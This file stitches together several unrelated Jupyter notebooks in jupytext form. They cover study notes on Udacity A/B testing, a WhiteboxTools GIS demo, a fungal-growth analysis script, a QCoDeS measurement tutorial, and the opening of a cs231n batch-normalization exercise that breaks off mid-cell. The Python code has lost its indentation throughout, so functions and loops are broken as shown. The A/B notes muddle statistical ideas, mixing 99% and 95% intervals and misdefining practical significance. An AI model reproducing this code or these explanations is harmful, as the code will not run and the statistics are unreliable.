# So you see in our case, CTP is the right decision to choose, and we revise our Hypothesis with CTP as test statistics. So when do we use CTR, and when do we use CTP? CTR usually measure the visibility (button in our example), while CTP measures the impact. CTP will avoid us the problem when users click more than once. CTP can be acquired when working with engineers, to capture number of click every change, and get CTR with at least one click.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398686/m-4004398688) 0:22*
# Considering large number of samples (1000) 150 is even further, if you know about standard error.
# We only have two possible possible outcome in click-through-probability, and concern probablity as metric. This would means we want to use binomial distribution, with success is the click, and failure is not click.
#
# If you want to refresh your binomial distribution, check out my other [blog](http://napitupulu-jon.appspot.com/posts/distribution-coursera-statistics-ud827.html#Binomial-Distribution).
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398690/m-4004398692) 1:32*
# 1. dependent
# 2. independent, 2 exclusive
# 3. same user, same search result
# 4. could be binomial, one event is one user complete one course. One user can't finish twice or more in one course
# 5. can be one user multiple purchases.
# Since there is two possible outcome, we would expect two peak at the distribution. When we're talking about the probability, especially with the law of large numbers, the probability becomes the proportion. p-success with click, and (1-p)-failuure with no click. Binomial require sample size that at least events occurs with click and no click are 5 times, to follow normal distribution.
# If follow normal distirbution, then ME = 1.96xStandard Error.
#
# If you need to refresh your statistics of Confidence Interval for proportion, check out my other [blog](http://napitupulu-jon.appspot.com/posts/ht-ci-categorical-coursera-statistics.html#Confidence-Interval).
# So for example, if samples is 2000, and number of click 300, 99% confidence interval gives us....
# %load_ext rpy2.ipython
# + language="R"
# c = 300
# n = 2000
# pe = 300/2000
# CL = 0.99
# SE = sqrt(pe*(1-pe)/n)
# z_star = round(qnorm((1-CL)/2,lower.tail=F),digits=2)
# ME = z_star * SE
#
# c(pe-ME, pe+ME)
# -
# Now we have our CTP in the range of 95% CI (Which means that 95% CI will capture the population difference). Remember the difference is before we begin the experiment, which divide to two groups. The idea is, if we apply changes in experiment group, then the observed difference has to be significant, that it outside the range of CI. When we're talking about positive changes (in increased of CTP), then it should be outside of CI positive boundary.
# ### Comparing two samples
#
# Comparing two sample(groups) will require us to use hypothesis testing. The difference (pooled difference) should be outside CI that we talked earlier.
#
# Again, if you want to refresh or feel alienating about estimating difference between two proportions of hypothesis testing, feel free to check my [other blog.](http://napitupulu-jon.appspot.com/posts/ht-ci-categorical-coursera-statistics.html)
# ### Practical, Substantive, Significance.
#
# When we're talking about difference, in statistics we know that there is practically significance and statistically significance. Statistically significance is what we calculated (our p-value). and practically significant is what we set as fixed significant level, in other words, our target leve.
#
# Why does it matter? Because as always, gathering data is expensive, require effort, time, and investments. That's why we don't wan't waste such resources. You can see further explanation in my other [blog](http://napitupulu-jon.appspot.com/posts/decision-coursera-statistiscs.html#Statistical-vs.-practical-significance). For business practice and investment wise, is what practical significance that matter.
#
# So what's to decide the level of significance? For company like Google, 2% difference is quite large.
# ### Size vs Power Trade Off
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398705) 2:40*
# When designing an experiment, we need to know how many pageviews (size of the data) to find what's statiscally significance/ statistics power.
#
# In Hypothesis testing, we can't blindly reject null hypothesis, when the statistics is only slightly lower than practical significance.
#
# There are trade-off that we know here. Increasing the size of the data will cost some investments. But it also making it more sensitive to the changes. And if it does make positive difference, then it will be profit for the company. This is what earlier we call statistical power, the sensitivity. (1-B) is the probability of correctly rejecting null hypothesis, which in this case we set it to 80%. (1-B) depends on the size, larger would means distance different is further between point estimate and null value. B is the subject of type 2 error.
# We set alpha as our difference at practical significance, and beta is the sensitivity, which control the failure on what we actually care about. We want beta to be inside alpha range (practical significance boundary, later at CI), by 80%. If we have small size of data, then type 2 error will be high, too high that it's within CI range, and we failed to reject null hypothesis. On the contrary, larger sample means, will makes alpha(as practical significance) still the same. Remember that larger sample means will raise the sensitivity, makes the standard error smaller and the CI range will be tighthen, too tight that can makes beta outside CI range
# If you want to see further about Type 1 error, Type 2 Error, Beta, and power, please check this [blog](http://napitupulu-jon.appspot.com/posts/decision-coursera-statistiscs.html#Decision-Errors)
# ### Calculating number of page views needed
#
# How many pages will we need in each group?
#
# If we look at our problem earlier, Suppose we have:
#
# ```
# N = 1000
# x = 100
# alpha = 0.05
# Beta = 0.3
# dmin = 2% (practical significance level)
# ```
#
# > dmin = minimum difference that we actually care about, with business practive
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398705) 2:40*
# Remember the sample size smaller, means higher standard error. If we increase the sample size, by the law of large numbers, it will approach closer to equal proportion, and further away from extreme.
#
# If we increased our dmin, then it would means we have more loosely significance. That we would accept if the difference is small, 20% dmin will have more error than 5% dmin. An increase in error, can be caused by decreasing the sample size.
#
# Increasing CI would increase the sample size. 95% level is a smaller range compared to 99% range, which means if we use 99%, the difference have to even further away to be outside the boundary range. And making the distance really different between null value and point estimate require larger sample size.
#
# Higher sensitivity, as we discussed earlier, will narrow the error distribution, hence require larger sample size.
# ### Analyze
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398712/m-4004398714) 0:55*
# Suppose we have our proportion of users based on number of click and number of unique users. Not equally same size because random assignment.
# There are two factors to consider when deciding the result of your A/B testing, that is whether to launch the change or not. First one is statistically significance must be different from zero. And the change is greater than your preference practical significance boundary.
# ### CI Breakdown
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398715/m-4004398717) 02:05*
# There are various cases where our CI could have positioned in difference range of the boundary. So it's best to get intuition behind it.If your confidence interval can capture the practical significance boundary, then it might be better to run some additional test. The first one is where we absolutely launch in the previous example. Because it's outside practical significance boundary.
#
# The second and the third one is not even touching the boundary, and because it's still within, it's not significance hence we not launch it.
#
# The next three intervals is trickier. They all touch the boundary. the longest CI touch both lower and upper boundary. If it outside lower boundary, we definitely not want to launch it, but nonetheless the other side touch the upper boundary. So we want to perform additional test. And the last two, the proportion is centered outside upper boundary, but their lower interval still within practical significance. So we want to proceed to additional test.
#
# Doing some additional test for the last 3 CI is needed as repetitive test gives us confidence. But it will require more sample and time, investment that some of the business side in your company wouldn't do. It's best to discuss with them further, along with additional risk if they insist to launch the changes. They know better from our recommendation, along with business strategy.
# > ***Disclaimer***:
#
# > *This blog is originally created as an online personal notebook, and the materials are not mine. Take the material as is. If you like this blog and or you think any of the material is a bit misleading and want to learn more, please visit the original sources at reference link below. *
#
# > ***References***:
# > * <NAME> and <NAME>. [Udacity](https://www.udacity.com/course/ab-testing--ud257)
|
machine_learning/lecture/week_1/ii_linear_regression_with_one_variable_week_1/.ipynb_checkpoints/abtesting-overview-udacity-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Using WhiteboxTools with ipyleaflet**
#
# - WhiteboxTools: https://github.com/jblindsay/whitebox-tools
# - WhiteboxTools frontends:
# - All in one:https://github.com/giswqs/whitebox-frontends
# - Python: https://github.com/giswqs/whitebox
# - R: https://github.com/giswqs/whiteboxR
# - Jupyter: https://github.com/giswqs/whiteboxgui
# - ArcGIS: https://github.com/giswqs/WhiteboxTools-ArcGIS
# - QGIS: https://jblindsay.github.io/wbt_book/qgis_plugin.html
# ## whiteboxgui
#
# - GitHub: https://github.com/giswqs/whiteboxgui
# - [Run whiteboxgui with Colab](https://colab.research.google.com/github/giswqs/whiteboxgui/blob/master/examples/examples.ipynb)
import whiteboxgui
whiteboxgui.show()
whiteboxgui.show(tree=True)
# ## whitebox
#
# - GitHub:https://github.com/giswqs/whitebox
# - [Run whitebox with Colab](https://colab.research.google.com/github/giswqs/whitebox-python/blob/master/examples/whitebox.ipynb)
import os
import pkg_resources
import whitebox
wbt = whitebox.WhiteboxTools()
print(wbt.version())
print(wbt.help())
data_dir = os.path.dirname(pkg_resources.resource_filename("whitebox", 'testdata/'))
print(data_dir)
in_dem = os.path.join(data_dir, "DEM.tif")
work_dir = os.path.expanduser('~/Downloads')
if not os.path.exists(work_dir):
os.makedirs(work_dir)
wbt.set_working_dir(work_dir)
wbt.verbose = True
wbt.feature_preserving_smoothing(in_dem, "smoothed.tif", filter=9)
wbt.breach_depressions("smoothed.tif", "breached.tif")
wbt.d_inf_flow_accumulation("breached.tif", "flow_accum.tif")
# ## Using whitebox with ipyleaflet
import geodemo
import whiteboxgui.whiteboxgui as wbt
from ipyleaflet import WidgetControl
m = geodemo.Map()
m
# +
tools_dict = wbt.get_wbt_dict()
wbt_toolbox = wbt.build_toolbox(
tools_dict, max_width="800px", max_height="500px"
)
wbt_control = WidgetControl(
widget=wbt_toolbox, position="bottomright"
)
m.add_control(wbt_control)
|
examples/whitebox.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# %matplotlib widget
import os
import sys
sys.path.insert(0, os.getenv('HOME')+'/pycode/MscThesis/')
import pandas as pd
from amftrack.util import get_dates_datetime, get_dirname, get_plate_number, get_postion_number
import ast
from amftrack.plotutil import plot_t_tp1
from scipy import sparse
from datetime import datetime
from amftrack.pipeline.functions.node_id import orient
import pickle
import scipy.io as sio
from pymatreader import read_mat
from matplotlib import colors
import cv2
import imageio
import matplotlib.pyplot as plt
import numpy as np
from skimage.filters import frangi
from skimage import filters
from random import choice
import scipy.sparse
import os
from amftrack.pipeline.functions.extract_graph import from_sparse_to_graph, generate_nx_graph, sparse_to_doc
from skimage.feature import hessian_matrix_det
from amftrack.pipeline.functions.experiment_class_surf import Experiment
from amftrack.pipeline.paths.directory import run_parallel, find_state, directory_scratch, directory_project, path_code
from amftrack.notebooks.analysis.data_info import *
import matplotlib.patches as mpatches
from statsmodels.stats import weightstats as stests
from mpl_toolkits.mplot3d import Axes3D
from scipy.ndimage import gaussian_filter
from scipy.ndimage import uniform_filter1d
from scipy import stats
import statsmodels.api as sm
from sklearn.neighbors import KernelDensity
# -
window=800
infos = pickle.load(open(f'{path_code}/MscThesis/Results/straight_bait_{window}.pick', "rb"))
set(infos['treatment'].values)
def get_angle(xa,ya,xb,yb):
dot_product = (xa*xb+ya*yb)/np.sqrt((xa**2+ya**2)*(xb**2+yb**2))
angle = (np.arccos(dot_product) / (2 * np.pi) * 360)*(1-2*((ya * xb - yb * xa) >= 0))
return(angle)
def getKernelDensityEstimation(values, x, bandwidth = 0.2, kernel = 'gaussian'):
model = KernelDensity(kernel = kernel, bandwidth=bandwidth)
model.fit(values[:, np.newaxis])
log_density = model.score_samples(x[:, np.newaxis])
return np.exp(log_density)
def bestBandwidth(data, minBandwidth = 1, maxBandwidth = 20, nb_bandwidths = 30, cv = 30):
"""
Run a cross validation grid search to identify the optimal bandwidth for the kernel density
estimation.
"""
from sklearn.model_selection import GridSearchCV
model = GridSearchCV(KernelDensity(),
{'bandwidth': np.linspace(minBandwidth, maxBandwidth, nb_bandwidths)}, cv=cv)
model.fit(data[:, None])
return model.best_params_['bandwidth']
infos.columns
infos['abs_angle_to_P']=np.abs(infos['angle_to_P'])
infos['abs_curvature']=np.abs(infos['curvature'])
infos['curvature_scaled']=infos['curvature']*np.sqrt(infos['growth'])
infos['abs_curvature_sq']=np.abs(infos['curvature'])*np.sqrt(infos['growth'])
infos['signed_straight']=(1-infos['straightness'])*(1-2*(infos['angle']<0))
infos['inv_dens']=1/infos['density']
infos['side_cross']=infos.apply (lambda row: comments[row['plate']] if row['plate'] in comments.keys() else 'None', axis=1)
infos['x']=infos['x'].astype(float)
infos['vx']=infos['vx'].astype(float)
infos['y']=infos['y'].astype(float)
infos['vy']=infos['vy'].astype(float)
infos['xinit']=infos['xinit'].astype(float)
infos['yinit']=infos['yinit'].astype(float)
blur = 20
infos['v'] = np.sqrt((infos['vx']**2+infos['vy']**2).astype(float))
infos['gd'] = np.sqrt((infos[f'grad_density_x{blur}']**2+infos[f'grad_density_y{blur}']**2).astype(float))
infos['spvgd']=(infos['vx']*infos[f'grad_density_x{blur}']+infos['vy']*infos[f'grad_density_y{blur}'])/(infos['v']*infos['gd'])
infos['angle_vgd']=get_angle(-infos[f'grad_density_x{blur}'],-infos[f'grad_density_y{blur}'],infos['vx'],infos['vy'])
infos['angle_vgd2']=get_angle(-infos[f'grad_density_x{blur}'],-infos[f'grad_density_y{blur}'],infos['xinit'],infos['yinit'])
infos['angle_Pgd']=infos['angle_vgd']+infos['angle_to_P']
infos['angle_Ngd']=infos['angle_vgd']+infos['angle_to_N']
# infos['residual']=infos['speed']-f(infos['spvgd'])
infos.to_csv(f'{path_code}/MscThesis/Results/growth_pattern.csv')
# + jupyter={"outputs_hidden": true}
infos
# -
corrected = infos.loc[(infos["straightness"] <= 1)& (infos["speed"] >=25)& (infos["speed"] <400)&(infos["straightness"] > 0.95)&(infos["density"]>0)]
baits = corrected.loc[corrected['treatment']=='baits']
no_baits = corrected .loc[corrected ['treatment']=='25']
no_baits_new = corrected .loc[corrected ['treatment']=='25*']
# +
plt.close('all')
fig = plt.figure()
bins = np.linspace(0, 400, 50)
ax = fig.add_subplot(111)
# ax.hist(corrected.loc[corrected['treatment'] == '25']['speed'],bins,alpha=0.3,label='Dummy baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['treatment'] == 'baits']['speed'],bins,alpha=0.3,label='P&N baits (heterogeneous rock form)',density=True)
# ax.hist(corrected.loc[corrected['treatment'] == '25*']['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['plate'] == 94]['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['plate'] == 69]['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# ax.hist(corrected.loc[corrected['plate'] == 102]['speed'],bins,alpha=0.3,label='No baits (homogeneous soluble)',density=True)
# x = np.linspace(-6,6,100)
x = np.linspace(0,400,100)
# bandwidth = 5
data = corrected.loc[corrected['plate'] == 69]['speed']
# data = corrected.loc[corrected['treatment'] == 'baits']['speed']
cv_bandwidth = bestBandwidth(data)
kde = getKernelDensityEstimation(data, x, bandwidth=cv_bandwidth)
ax.hist(data,30,density=True)
plt.plot(x, kde, alpha = 0.8, label = f'bandwidth = {round(cv_bandwidth, 2)}')
ax.set_xlabel(r'speed ($\mu m.h^{-1} $)')
plt.legend(loc='upper right')
ax.set_ylabel(r'density')
# -
from unidip import UniDip
import unidip.dip as dip
data = np.msort(data)
print(dip.diptst(data))
intervals = UniDip(data).run()
print(intervals)
# +
from unidip import UniDip
# create bi-modal distribution
dat = np.concatenate([np.random.randn(200)-3, np.random.randn(200)+3])
# sort data so returned indices are meaningful
dat = np.msort(dat)
# get start and stop indices of peaks
intervals = UniDip(dat).run()
# -
right_crossing = [plate for plate in comments.keys() if comments[plate]=='right']
non_turning = [plate for plate in set(corrected['plate'].values) if np.mean(corrected.loc[corrected['plate']==plate]['signed_straight'])<0.005]
# +
plt.close('all')
plate_select = corrected.loc[corrected ['plate']==94]
# plate_select = corrected.loc[corrected ['plate'].isin(right_crossing)]
# straight_going = corrected.loc[corrected['plate'].isin(non_turning)]
abcisse = 'density'
ordinate = 'speed'
tab = plate_select
baits_sort = tab.sort_values(abcisse)
N=800
moving_av = baits_sort.rolling(N,min_periods=N//2).mean()
moving_std = baits_sort.rolling(N,min_periods=N//2).std()
fig=plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.set_xlabel('angle between growth direction and gradient of density (°)')
ax.set_ylabel('speed ($\mu m .h^{-1}$)')
ax.set_xlim(0,6)
# ax.set_ylim(-0.5,0.5)
# ax.set_xlim(-190,190)
# slope, intercept, r_value, p_value, std_err = stats.linregress(densities_sort,np.abs(curvatures_sort))
for plate in set(tab['plate'].values):
select = tab.loc[tab['plate']==plate]
ax.scatter(select[abcisse],select[ordinate],label=plate,alpha=0.3)
ax.plot(moving_av[abcisse],moving_av[ordinate],color='green',label = 'moving average')
ax.plot(moving_av[abcisse],(moving_av[ordinate]+moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
ax.plot(moving_av[abcisse],(moving_av[ordinate]-moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
# ax.legend()
# -
from scipy.interpolate import interp1d
x = moving_av["spvgd"]
y = moving_av["speed"]
f = interp1d(x, y,copy=True,fill_value=(250,160),bounds_error=False)
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(9, 4))
bplot1 = corrected.boxplot(column = ['angle_vgd2'],by="treatment",figsize =(9,8),ax =ax,patch_artist=True, showfliers=False, notch=True,showmeans = True)
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(9, 4))
bplot1 = corrected.boxplot(column = ['signed_straight'],by="plate",figsize =(9,8),ax =ax,patch_artist=True, showfliers=False, notch=True,showmeans = True)
# + jupyter={"outputs_hidden": true}
tab
# -
np.mean(tab['angle_vgd2']),np.std(tab['angle_vgd2'])/np.sqrt(len(tab))
# +
plt.close('all')
plate_select = corrected.loc[corrected ['plate']==436]
abcisse = 'angle_to_P'
ordinate = 'residual'
tab = baits
baits_sort = tab.sort_values(abcisse)
N=600
moving_av = baits_sort.rolling(N,min_periods=N//2).mean()
moving_std = baits_sort.rolling(N,min_periods=N//2).std()
fig=plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.set_xlabel('normalised scalar product speed.density gradient')
ax.set_ylabel('residual($\mu m. h^{-1}$)')
# ax.set_xlim(-0.001,0.001)
# ax.set_ylim(-150,150)
# ax.set_xlim(-190,190)
# slope, intercept, r_value, p_value, std_err = stats.linregress(densities_sort,np.abs(curvatures_sort))
for plate in set(tab['plate'].values):
select = tab.loc[tab['plate']==plate]
ax.scatter(select[abcisse],select[ordinate],label=plate,alpha=0.3)
ax.plot(moving_av[abcisse],moving_av[ordinate],color='green',label = 'moving average')
ax.plot(moving_av[abcisse],(moving_av[ordinate]+moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
ax.plot(moving_av[abcisse],(moving_av[ordinate]-moving_std[ordinate]/np.sqrt(N)),color='red',label = 'std')
# +
def get_density_map(plate,t,compress,blur,x,y,fz):
densities=np.zeros((30000//compress,60000//compress),dtype=np.float)
select = corrected.loc[(corrected['plate']==plate) & (corrected['t']==t)]
for index,row in select.iterrows():
xx = int(row[x])//compress
yy = int(row[y])//compress
densities[xx,yy]+=fz(row)
density_filtered = gaussian_filter(densities,blur)
return(density_filtered)
# -
ts = set(corrected.loc[(corrected['plate']==419)]['t'])
ts = list(ts)
ts.sort()
# +
compress = 100
blur = 20
densities=np.zeros((30000//compress,60000//compress),dtype=np.float)
count=np.zeros((30000//compress,60000//compress),dtype=np.float)
select = corrected
for index,row in select.iterrows():
xx = int(row['x'])//compress
yy = int(row['y'])//compress
densities[xx,yy]+=row['angle_vgd']
count[xx,yy]+=1
density_filtered = gaussian_filter(densities/(count+(count==0).astype(float)),blur)
# -
densities = [get_density_map(419,t,100,5,'x','y',lambda row : row['speed']) for t in ts]
plt.close('all')
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(9, 4))
ax.imshow(density_filtered)
imageio.mimsave(f'movie.gif', densities,duration = 1)
|
amftrack/notebooks/analysis/grad_density.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # QCoDeS tutorial
# Basic overview of QCoDeS
#
# ## Table of Contents <a class="anchor" id="toc"></a>
# * [Workflow](#workflow)
# * [Basic instrument interaction](#inst_io)
# * [Measuring](#measurement)
# * [The loop: 1D example](#loop_1D)
# * [The loop: 2D example](#loop_2D)
#
# ## Typical QCodes workflow <a class="anchor" id="workflow"></a>
# (back to [ToC](#toc))
#
# 1. Start up an interactive python session (e.g. using jupyter)
# 2. import desired modules
# 3. instantiate required instruments
# 4. experiment!
# ### Importing
# +
# usually, one imports QCoDeS and some instruments
import qcodes as qc
# In this tutorial, we import the dummy instrument
from qcodes.tests.instrument_mocks import DummyInstrument
# real instruments are imported in a similar way, e.g.
# from qcodes.instrument_drivers.Keysight.Keysight_33500B import Keysight_33500B
# -
# ### Instantiation of instruments
# +
# It is not enough to import the instruments, they must also be instantiated
# Note that this can only be done once. If you try to re-instantiate an existing instrument, QCoDeS will
# complain that 'Another instrument has the name'.
# In this turotial, we consider a simple situation: A single DAC outputting voltages to a Digital Multi Meter
dac = DummyInstrument(name="dac", gates=['ch1', 'ch2']) # The DAC voltage source
dmm = DummyInstrument(name="dmm", gates=['voltage']) # The DMM voltage reader
# the default dummy instrument returns always a constant value, in the following line we make it random
# just for the looks 💅
import random
dmm.voltage.get = lambda: random.randint(0, 100)
# Finally, the instruments should be bound to a Station. Only instruments bound to the Station get recorded in the
# measurement metadata, so your metadata is blind to any instrument not in the Station.
station = qc.Station(dac, dmm)
# +
# For the tutorial, we add a parameter that loudly prints what it is being set to
# (It is used below)
chX = 0
def myget():
return chX
def myset(x):
global chX
chX = x
print('Setting to {}'.format(x))
return None
dac.add_parameter('verbose_channel',
label='Verbose Channel',
unit='V',
get_cmd=myget,
set_cmd=myset)
# -
# ### The location provider can be set globally
loc_provider = qc.data.location.FormatLocation(fmt='data/{date}/#{counter}_{name}_{time}')
qc.data.data_set.DataSet.location_provider=loc_provider
# We are now ready to play with the instruments!
# ## Basic instrument interaction <a class="anchor" id="inst_io"></a>
# (back to [ToC](#toc))
#
# The interaction with instruments mainly consists of `setting` and `getting` the instruments' `parameters`. A parameter can be anything from the frequency of a signal generator over the output impedance of an AWG to the traces from a lock-in amplifier. In this tutorial we --for didactical reasons-- only consider scalar parameters.
# The voltages output by the dac can be set like so
dac.ch1.set(8)
# Now the output is 8 V. We can read this value back
dac.ch1.get()
# Setting IMMEDIATELY changes a value. For voltages, that is sometimes undesired. The value can instead be ramped by stepping and waiting.
# +
dac.verbose_channel.set(0)
dac.verbose_channel.set(9) # immediate voltage jump of 9 Volts (!)
# first set a step size
dac.verbose_channel.step = 0.1
# and a wait time
dac.verbose_channel.inter_delay = 0.01 # in seconds
# now a "staircase ramp" is performed by setting
dac.verbose_channel.set(5)
# after such a ramp, it is a good idea to reset the step and delay
dac.verbose_channel.step = 0
# and a wait time
dac.verbose_channel.inter_delay = 0
# -
# <span style="color:blue">**NOTE**</span>: that is ramp is blocking and has a low resolution since each `set` on a real instrument has a latency on the order of ms. Some instrument drivers support native-resolution asynchronous ramping. Always refer to your instrument driver if you need high performance of an instrument.
# ## Measuring <a class="anchor" id="measurement"></a>
# (back to [ToC](#toc))
#
# ### 1D Loop example
#
# #### Defining the `Loop` and actions
#
# Before you run a measurement loop you do two things:
# 1. You describe what parameter(s) to vary and how. This is the creation of a `Loop` object: `loop = Loop(sweep_values, ...)`
# 2. You describe what to do at each step in the loop. This is `loop.each(*actions)`
# - measurements (any object with a `.get` method will be interpreted as a measurement)
# - `Task`: some callable (which can have arguments with it) to be executed each time through the loop. Does not generate data.
# - `Wait`: a specialized `Task` just to wait a certain time.
# - `BreakIf`: some condition that, if it returns truthy, breaks (this level of) the loop
# +
# For instance, sweep a dac voltage and record with the dmm
loop = qc.Loop(dac.ch1.sweep(0, 20, 0.1), delay=0.001).each(dmm.voltage)
data = loop.get_data_set(name='testsweep')
# -
plot_1d = qc.QtPlot() # create a plot
plot_1d.add(data.dmm_voltage) # add a graph to the plot
_ = loop.with_bg_task(plot_1d.update, plot_1d.save).run() # run the loop
# The plot may be recalled easily
plot_1d
# #### Output of the loop
#
# * A loop returns a dataset.
# * The representation of the dataset shows what arrays it contains and where it is saved.
# * The dataset initially starts out empty (filled with NAN's) and get's filled while the Loop get's executed.
# Once the measurement is done, take a look at the file in finder/explorer (the dataset.location should give you the relative path).
# Note also the snapshot that captures the settings of all instruments at the start of the Loop.
# This metadata is also accesible from the dataset and captures a snapshot of each instrument listed in the station.
dac.snapshot()
# There is also a more human-readable version of the essential information.
dac.print_readable_snapshot()
# ## Loading data
# The dataset knows its own location, which we may use to load data.
# +
location = data.location
loaded_data = qc.load_data(location)
plot = qc.MatPlot(loaded_data.dmm_voltage)
# -
#
# ## Example: multiple 2D measurements with live plotting
# +
# Loops can be nested, so that a new sweep runs for each point in the outer loop
loop = qc.Loop(dac.ch1.sweep(0, 5, 1), 0.1).loop(dac.ch2.sweep(0, 5, 1), 0.1).each(
dmm.voltage
)
data = loop.get_data_set(name='2D_test')
# -
plot = qc.QtPlot()
plot.add(data.dmm_voltage, figsize=(1200, 500))
_ = loop.with_bg_task(plot.update, plot.save).run()
plot
|
docs/examples/Tutorial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Batch Normalization
# One way to make deep networks easier to train is to use more sophisticated optimization procedures such as SGD+momentum, RMSProp, or Adam. Another strategy is to change the architecture of the network to make it easier to train. One idea along these lines is batch normalization which was recently proposed by [3].
#
# The idea is relatively straightforward. Machine learning methods tend to work better when their input data consists of uncorrelated features with zero mean and unit variance. When training a neural network, we can preprocess the data before feeding it to the network to explicitly decorrelate its features; this will ensure that the first layer of the network sees data that follows a nice distribution. However even if we preprocess the input data, the activations at deeper layers of the network will likely no longer be decorrelated and will no longer have zero mean or unit variance since they are output from earlier layers in the network. Even worse, during the training process the distribution of features at each layer of the network will shift as the weights of each layer are updated.
#
# The authors of [3] hypothesize that the shifting distribution of features inside deep neural networks may make training deep networks more difficult. To overcome this problem, [3] proposes to insert batch normalization layers into the network. At training time, a batch normalization layer uses a minibatch of data to estimate the mean and standard deviation of each feature. These estimated means and standard deviations are then used to center and normalize the features of the minibatch. A running average of these means and standard deviations is kept during training, and at test time these running averages are used to center and normalize features.
#
# It is possible that this normalization strategy could reduce the representational power of the network, since it may sometimes be optimal for certain layers to have features that are not zero-mean or unit variance. To this end, the batch normalization layer includes learnable shift and scale parameters for each feature dimension.
#
# [3] <NAME> and <NAME>, "Batch Normalization: Accelerating Deep Network Training by Reducing
# Internal Covariate Shift", ICML 2015.
# +
# As usual, a bit of setup
from __future__ import print_function
import time
import numpy as np
import matplotlib.pyplot as plt
from cs231n.classifiers.fc_net import *
from cs231n.data_utils import get_CIFAR10_data
from cs231n.gradient_check import eval_numerical_gradient, eval_numerical_gradient_array
from cs231n.solver import Solver
# %matplotlib inline
plt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
# for auto-reloading external modules
# see http://stackoverflow.com/questions/1907993/autoreload-of-modules-in-ipython
# %load_ext autoreload
# %autoreload 2
def rel_error(x, y):
""" returns relative error """
return np.max(np.abs(x - y) / (np.maximum(1e-8, np.abs(x) + np.abs(y))))
# +
# Load the (preprocessed) CIFAR10 data.
data = get_CIFAR10_data()
for k, v in data.items():
print('%s: ' % k, v.shape)
# -
# ## Batch normalization: Forward
# In the file `cs231n/layers.py`, implement the batch normalization forward pass in the function `batchnorm_forward`. Once you have done so, run the following to test your implementation.
# +
# Check the training-time forward pass by checking means and variances
# of features both before and after batch normalization
# Simulate the forward pass for a two-layer network
np.random.seed(231)
N, D1, D2, D3 = 200, 50, 60, 3
X = np.random.randn(N, D1)
W1 = np.random.randn(D1, D2)
W2 = np.random.randn(D2, D3)
a = np.maximum(0, X.dot(W1)).dot(W2)
print('Before batch normalization:')
print(' means: ', a.mean(axis=0))
print(' stds: ', a.std(axis=0))
# Means should be close to zero and stds close to one
print('After batch normalization (gamma=1, beta=0)')
a_norm, _ = batchnorm_forward(a, np.ones(D3), np.zeros(D3), {'mode': 'train'})
print(' mean: ', a_norm.mean(axis=0))
print(' std: ', a_norm.std(axis=0))
# Now means should be close to beta and stds close to gamma
gamma = np.asarray([1.0, 2.0, 3.0])
beta = np.asarray([11.0, 12.0, 13.0])
a_norm, _ = batchnorm_forward(a, gamma, beta, {'mode': 'train'})
print('After batch normalization (nontrivial gamma, beta)')
print(' means: ', a_norm.mean(axis=0))
print(' stds: ', a_norm.std(axis=0))
# +
# Check the test-time forward pass by running the training-time
# forward pass many times to warm up the running averages, and then
# checking the means and variances of activations after a test-time
# forward pass.
np.random.seed(231)
N, D1, D2, D3 = 200, 50, 60, 3
W1 = np.random.randn(D1, D2)
W2 = np.random.randn(D2, D3)
bn_param = {'mode': 'train'}
gamma = np.ones(D3)
beta = np.zeros(D3)
for t in range(50):
X = np.random.randn(N, D1)
a = np.maximum(0, X.dot(W1)).dot(W2)
batchnorm_forward(a, gamma, beta, bn_param)
bn_param['mode'] = 'test'
X = np.random.randn(N, D1)
a = np.maximum(0, X.dot(W1)).dot(W2)
a_norm, _ = batchnorm_forward(a, gamma, beta, bn_param)
# Means should be close to zero and stds close to one, but will be
# noisier than training-time forward passes.
print('After batch normalization (test-time):')
print(' means: ', a_norm.mean(axis=0))
print(' stds: ', a_norm.std(axis=0))
# -
# ## Batch Normalization: backward
# Now implement the backward pass for batch normalization in the function `batchnorm_backward`.
#
# To derive the backward pass you should write out the computation graph for batch normalization and backprop through each of the intermediate nodes. Some intermediates may have multiple outgoing branches; make sure to sum gradients across these branches in the backward pass.
#
# Once you have finished, run the following to numerically check your backward pass.
# +
# Gradient check batchnorm backward pass
np.random.seed(231)
N, D = 4, 5
x = 5 * np.random.randn(N, D) + 12
gamma = np.random.randn(D)
beta = np.random.randn(D)
dout = np.random.randn(N, D)
